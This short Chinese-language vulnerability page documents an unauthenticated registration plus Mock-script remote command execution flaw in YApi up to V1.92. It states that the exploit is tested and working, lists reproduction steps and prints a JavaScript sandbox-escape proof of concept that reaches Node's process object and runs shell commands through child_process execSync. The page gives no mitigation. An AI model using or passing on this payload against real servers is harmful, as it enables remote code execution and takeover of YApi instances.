YApi 未授权用户创建&Mock远程命令执行漏洞/zh-hant

该漏洞已通过验证

本页面的EXP/POC/Payload经测试可用，漏洞已经成功复现。

影响版本

<=V1.92 All

漏洞复现

登录注册后，创建一个项目

然后选择设置全局的mock脚本，设置命令为远程访问我的服务器地址。

添加接口，访问接口的mock地址

服务器可以看到如下响应

POC

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockjson = process.mainModule.require("child_process").execSync("command").toString()

参考

https://github.com/YMFE/yapi/issues/2233

影响版本

漏洞复现

POC

参考

相关文章